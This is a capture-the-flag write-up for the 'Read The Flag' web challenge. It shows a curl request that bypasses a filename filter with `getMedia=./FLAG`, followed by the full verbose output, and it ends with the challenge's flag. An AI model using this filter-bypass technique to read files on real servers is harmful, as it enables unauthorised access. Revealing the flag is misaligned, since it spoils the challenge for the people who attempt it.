Read The Flag
Solution
Under the challenge address there are few words from the author
But in closer look I’ve realized that I’ve been redirected from the original address.
I’ve investigated the redirection path, which looks like below.
https://ch2.sbug.se/ => https://ch2.sbug.se/get?getMedia=README => https://ch2.sbug.se/read
The /get?getMedia=README response setups below cookie:
< set-cookie: content=”H3llo\012This is my resume.\012I am EXPERT in cyber security\012″; Path=/
which after redirection is displayed under the /read address.
I’ve played a bit with it until I’ve found that https://ch2.sbug.se/get?getMedia=FLAG responds with YOU CANNOT GET A FLAG THAT EASY message. That’s why I’ve tried below:
curl ‘https://ch2.sbug.se/get?getMedia=./FLAG’ –v
* Trying 172.67.202.196:443…
* Connected to ch2.sbug.se (172.67.202.196) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
* CAfile: /etc/ssl/certs/ca-certificates.crt
* CApath: /etc/ssl/certs
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8):
* TLSv1.3 (IN), TLS handshake, Certificate (11):
* TLSv1.3 (IN), TLS handshake, CERT verify (15):
* TLSv1.3 (IN), TLS handshake, Finished (20):
* TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.3 (OUT), TLS handshake, Finished (20):
* SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384
* ALPN, server accepted to use h2
* Server certificate:
* subject: C=US; ST=California; L=San Francisco; O=Cloudflare, Inc.; CN=sni.cloudflaressl.com
* start date: Mar 8 00:00:00 2021 GMT
* expire date: Mar 7 23:59:59 2022 GMT
* subjectAltName: host “ch2.sbug.se” matched cert’s “*.sbug.se”
* issuer: C=US; O=Cloudflare, Inc.; CN=Cloudflare Inc ECC CA-3
* SSL certificate verify ok.
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x55901e3ca560)
> GET /get?getMedia=./FLAG HTTP/2
> Host: ch2.sbug.se
> user-agent: curl/7.74.0
> accept: */*
>
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
* old SSL session ID is stale, removing
* Connection state changed (MAX_CONCURRENT_STREAMS == 256)!
< HTTP/2 302
< date: Tue, 20 Apr 2021 18:30:57 GMT
< content-type: text/html; charset=utf-8
< set-cookie: __cfduid=d2e8b3c0a2ee3362d38825d94d517a3d51618943457; expires=Thu, 20-May-21 18:30:57 GMT; path=/; domain=
.sbug.se; HttpOnly; SameSite=Lax; Secure
< location: https://ch2.sbug.se/read
< set-cookie: content=”SBCTF{H0W_C0ULD_Y0U_R3AD_TH3_FL4G}\012″; Path=/
< cf-cache-status: DYNAMIC
< cf-request-id: 099225cfc800009d127131b000000001
< expect-ct: max-age=604800, report-uri=”https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct”
< report-to: {“endpoints”:[{“url”:”https:\/\/a.nel.cloudflare.com\/report?s=YCgCZJN%2BAHTWNQvla1%2B0C32CkovAgJ8ByqWQwd1J
YOV6uj77HqByk1adOR1Dou8j7%2BBTx5Otb%2Bms%2FoIngEhqqwfXhmSRKCTMah6reQ%3D%3D”}],”max_age”:604800,”group”:”cf-nel”}
< nel: {“report_to”:”cf-nel”,”max_age”:604800}
< server: cloudflare
< cf-ray: 6430725faae19d12-AMS
< alt-svc: h3-27=”:443″; ma=86400, h3-28=”:443″; ma=86400, h3-29=”:443″; ma=86400
Flag
SBCTF{H0W_C0ULD_Y0U_R3AD_TH3_FL4G}
